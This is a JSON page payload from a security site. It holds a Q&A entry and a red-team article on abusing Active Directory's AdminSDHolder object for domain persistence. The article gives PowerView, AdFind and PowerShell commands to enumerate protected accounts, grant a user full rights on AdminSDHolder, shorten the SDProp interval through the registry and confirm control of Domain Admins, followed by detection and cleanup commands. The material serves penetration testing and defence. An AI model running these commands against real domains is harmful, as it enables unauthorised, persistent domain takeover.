[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fo8-Ys5A6glV0ThgbOn2NLo2tyRIxsWjbG_0zNV88oFk":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":33,"aiModel":30,"aiConfidence":30,"updatedAt":50,"createdAt":50,"_status":49},724,"Why is it important to understand the AdminSDHolder propagation mechanism when assessing domain security?","The 60-minute automatic propagation means any ACL backdoor placed on AdminSDHolder re-applies even if a specific account’s ACL is manually cleaned, making it a stealthy persistence method. Attackers may combine this with token-based attacks like [Penetration Techniques - Exploitation of net session in Windows](\u002Fnews\u002Fpenetration-techniques-exploitation-of-net-session-in-windows). Understanding this helps defenders prioritize detection of AdminSDHolder changes over individual account audits.","\u003Cp>The 60-minute automatic propagation means any ACL backdoor placed on AdminSDHolder re-applies even if a specific account’s ACL is manually cleaned, making it a stealthy persistence method. Attackers may combine this with token-based attacks like [Penetration Techniques - Exploitation of net session in Windows](\u002Fnews\u002Fpenetration-techniques-exploitation-of-net-session-in-windows). Understanding this helps defenders prioritize detection of AdminSDHolder changes over individual account audits.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-adminsdholder\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","why-is-it-important-to-understand-the-adminsdholder-propagation-mechanism-when-a-1777482210262","propagation, persistence, security assessment, SDProp, domain security",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":27,"cover":30,"author":31,"views":19,"readingTime":32,"status":33,"publishedAt":34,"seo":35,"tags":39,"qaPairs":40,"meta":46,"updatedAt":47,"createdAt":48,"_status":49},178,"Domain Penetration - AdminSDHolder","domain-penetration-adminsdholder","Learn how to exploit AdminSDHolder for domain privilege escalation, including ACL modification, enumeration of protected accounts, and detection methods.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>AdminSDHolder is a special AD container with some default security permissions, serving as a template for protected AD accounts and groups\u003C\u002Fp>\u003Cp>Active Directory adopts the ACL of the AdminSDHolder object and periodically applies it to all protected AD accounts and groups to prevent accidental and unintentional modifications and ensure secure access to these objects\u003C\u002Fp>\u003Cp>If the ACL of the AdminSDHolder object can be modified, the altered permissions will automatically apply to all protected AD accounts and groups, which can serve as a method for maintaining domain environment privileges\u003C\u002Fp>\u003Cp>This article will reference publicly available materials, combine personal understanding, introduce exploitation methods, supplement methods for clearing ACLs, and analyze detection methods\u003C\u002Fp>\u003Ch2>0x01 Overview\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Exploitation approach\u003C\u002Fli>\u003Cli>How to enumerate information in protected AD accounts and groups\u003C\u002Fli>\u003Cli>How to query the ACL of the AdminSDHolder object\u003C\u002Fli>\u003Cli>How to add ACLs to the AdminSDHolder object\u003C\u002Fli>\u003Cli>How to remove ACLs for specified users in AdminSDHolder\u003C\u002Fli>\u003Cli>Complete exploitation method\u003C\u002Fli>\u003Cli>Detection recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Exploitation approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Enumerate information from protected AD accounts and groups\u003C\u002Fh3>\u003Cp>Typically high-privilege users within the domain, including the following groups in my Server 2008 R2:\u003C\u002Fp>\u003Cul>\u003Cli>Administrators\u003C\u002Fli>\u003Cli>Print Operators\u003C\u002Fli>\u003Cli>Backup Operators\u003C\u002Fli>\u003Cli>Replicator\u003C\u002Fli>\u003Cli>Domain Controllers\u003C\u002Fli>\u003Cli>Schema Admins\u003C\u002Fli>\u003Cli>Enterprise Admins\u003C\u002Fli>\u003Cli>Domain Admins\u003C\u002Fli>\u003Cli>Server Operators\u003C\u002Fli>\u003Cli>Account Operators\u003C\u002Fli>\u003Cli>Read-only Domain Controllers\u003C\u002Fli>\u003Cli>Organization Management\u003C\u002Fli>\u003Cli>Exchange Trusted Subsystem\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>2. Add ACL to AdminSDHolder object\u003C\u002Fh3>\u003Cp>For example, adding full management permissions for user testa to AdminSDHolder. The permission configuration information is automatically pushed after 60 minutes by default, and testa then gains full management permissions for all protected accounts and groups.\u003C\u002Fp>\u003Ch3>3. Gain control over the entire domain\u003C\u002Fh3>\u003Cp>At this point, user testa can add accounts to the domain administrator group and directly access files on the domain controller.\u003C\u002Fp>\u003Ch2>0x03 Enumerate information in protected AD accounts and groups\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Reference materials about AdminSDHolder:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fprevious-versions\u002Ftechnet-magazine\u002Fee361593(v=msdn.10)#id0250006\u003C\u002Fp>\u003Cp>The characteristics of protected AD accounts and groups are as follows:\u003C\u002Fp>\u003Cp>\u003Cstrong>AdminCount attribute is 1\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>However, if an object has been moved out of a protected group, its AdminCount attribute remains 1, meaning it is possible to obtain accounts and groups that were once protected.\u003C\u002Fp>\u003Ch3>1. Methods for enumerating protected AD accounts\u003C\u002Fh3>\u003Ch4>(1) PowerView\u003C\u002Fh4>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fmaster\u002FRecon\u002FPowerView.ps1\u003C\u002Fp>\u003Cp>Command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-NetUser -AdminCount\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Command to filter only usernames as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-NetUser -AdminCount | select samaccountname\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Adfind\u003C\u002Fh4>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.joeware.net\u002Ffreetools\u002Ftools\u002Fadfind\u002Findex.htm\u003C\u002Fp>\u003Cp>Command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Adfind.exe -f \"&amp;(objectcategory=person)(samaccountname=*)(admincount=1)\" -dn\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) ActiveDirectory module\u003C\u002Fh4>\u003Cp>PowerShell module, requires installation, generally installed on domain controllers\u003C\u002Fp>\u003Cp>The commands are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module ActiveDirectory\u003Cbr>Get-ADObject -LDAPFilter \"(&amp;(admincount=1)(|(objectcategory=person)(objectcategory=group)))\" |select name\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>For systems without the Active Directory module installed, you can import the Active Directory module using the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import-module .\\Microsoft.ActiveDirectory.Management.dll\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Microsoft.ActiveDirectory.Management.dll is generated after installing the PowerShell Active Directory module. I have extracted it and uploaded it to GitHub:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This command lists protected AD accounts and groups\u003C\u002Fp>\u003Ch3>2. Methods for enumerating protected AD groups\u003C\u002Fh3>\u003Ch4>(1) PowerView\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-NetGroup -AdminCount\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Adfind\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Adfind.exe -f \"&amp;(objectcategory=group)(admincount=1)\" -dn\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) ActiveDirectory Module\u003C\u002Fh4>\u003Cp>A PowerShell module that requires installation, typically installed on domain controllers\u003C\u002Fp>\u003Cp>Commands are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module ActiveDirectory\u003Cbr>Get-ADObject -LDAPFilter “(&amp;(admincount=1)(|(objectcategory=person)(objectcategory=group)))” |select name\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This command lists protected AD accounts and groups\u003C\u002Fp>\u003Ch2>0x04 Manipulating ACLs of AdminSDHolder Objects\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Query ACLs of AdminSDHolder Objects\u003C\u002Fh3>\u003Cp>Using PowerView, address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fmaster\u002FRecon\u002FPowerView.ps1\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This version does not support the Remove-DomainObjectAcl command\u003C\u002Fp>\u003Cp>Querying the ACL of the AdminSDHolder object is equivalent to querying the ACL of \"CN=AdminSDHolder,CN=System,DC=test,DC=com\"\u003C\u002Fp>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Get-ObjectAcl -ADSprefix \"CN=AdminSDHolder,CN=System\" |select IdentityReference\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Adding ACL to the AdminSDHolder object\u003C\u002Fh3>\u003Cp>Using PowerView, the address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fmaster\u002FRecon\u002FPowerView.ps1\u003C\u002Fp>\u003Cp>Add full access permissions for user testa, the command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName testa -Verbose -Rights All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>By default, after waiting 60 minutes, testa gains full access to all protected AD accounts and groups\u003C\u002Fp>\u003Ch3>3. Removing ACL for a specified user in AdminSDHolder\u003C\u002Fh3>\u003Cp>Using PowerView, the address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This version supports the Remove-DomainObjectAcl command but does not support the TargetADSprefix parameter, so the TargetSearchBase parameter is used here instead.\u003C\u002Fp>\u003Cp>The search condition is \"LDAP:\u002F\u002FCN=AdminSDHolder,CN=System,DC=test,DC=com\".\u003C\u002Fp>\u003Cp>To remove full access permissions for user testa, the command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-DomainObjectAcl -TargetSearchBase \"LDAP:\u002F\u002FCN=AdminSDHolder,CN=System,DC=test,DC=com\" -PrincipalIdentity testa -Rights All -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x05 Complete Exploitation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Enumerate information from protected AD accounts and groups\u003C\u002Fh3>\u003Cp>Identify valuable users, confirm whether they belong to protected AD accounts and groups, and exclude those who previously belonged to protected AD accounts and groups.\u003C\u002Fp>\u003Ch3>2. Add ACLs to the AdminSDHolder object\u003C\u002Fh3>\u003Cp>For example, add full access permissions for user testa to AdminSDHolder.\u003C\u002Fp>\u003Cp>By default, after waiting 60 minutes, testa gains full access to all protected AD accounts and groups.\u003C\u002Fp>\u003Cp>The interval for permission propagation can be adjusted by modifying the registry, with the registry location as follows:\u003C\u002Fp>\u003Cul>\u003Cli>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters,AdminSDProtectFrequency,REG_DWORD\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For example, to modify it to wait 600 seconds, the command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hklm\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters \u002Fv AdminSDProtectFrequency \u002Ft REG_DWORD \u002Fd 600\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblogs.technet.microsoft.com\u002Faskds\u002F2009\u002F05\u002F07\u002Ffive-common-questions-about-adminsdholder-and-sdprop\u002F\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>It is not recommended to reduce the default interval time, as it may cause LSASS performance degradation in large environments\u003C\u002Fp>\u003Ch3>3. Gaining Full Control Over the Domain\u003C\u002Fh3>\u003Ch4>(1) User testa can add accounts to the Domain Admins group\u003C\u002Fh4>\u003Cp>The command to verify permissions is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Get-ObjectAcl -SamAccountName \"Domain Admins\" -ResolveGUIDs | ?{$_.IdentityReference -match 'testa'}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) User testa can directly access files on the domain controller\u003C\u002Fh4>\u003Ch2>0x06 Detection and Cleanup\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Detecting AdminSDHolder ACL\u003C\u002Fh3>\u003Cp>View the ACL of \"CN=AdminSDHolder,CN=System,DC=test,DC=com\" with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Get-ObjectAcl -ADSprefix \"CN=AdminSDHolder,CN=System\" |select IdentityReference\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>PowerView version used here:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fmaster\u002FRecon\u002FPowerView.ps1\u003C\u002Fp>\u003Cp>Check for suspicious users\u003C\u002Fp>\u003Ch3>2. Clear suspicious user ACLs in AdminSDHolder\u003C\u002Fh3>\u003Cp>Remove suspicious user testa's ACL in AdminSDHolder\u003C\u002Fp>\u003Cp>Using PowerView, address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1\u003C\u002Fp>\u003Cp>Remove full access permissions for user testa, command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-DomainObjectAcl -TargetSearchBase \"LDAP:\u002F\u002FCN=AdminSDHolder,CN=System,DC=test,DC=com\" -PrincipalIdentity testa -Rights All -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the exploitation method of AdminSDHolder for privilege persistence, supplementing detection and clearance methods for suspicious user ACLs in AdminSDHolder\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr",null,"Onedaysec",5,"published","2026-02-02T07:38:21.202Z",{"title":36,"description":14,"keywords":37,"ogImage":30,"canonicalUrl":30,"noIndex":38},"AdminSDHolder Exploitation: Domain Privilege Escalation & Detection","AdminSDHolder, Active Directory, ACL, domain penetration, privilege escalation, security permissions, AdminCount, PowerView, Adfind, detection",false,[],{"docs":41,"hasNextPage":38},[4,42,43,44,45],723,722,721,720,{"title":30,"description":30,"image":30},"2026-07-24T02:07:19.986Z","2026-07-23T16:02:00.271Z","draft","2026-07-23T16:14:23.532Z"]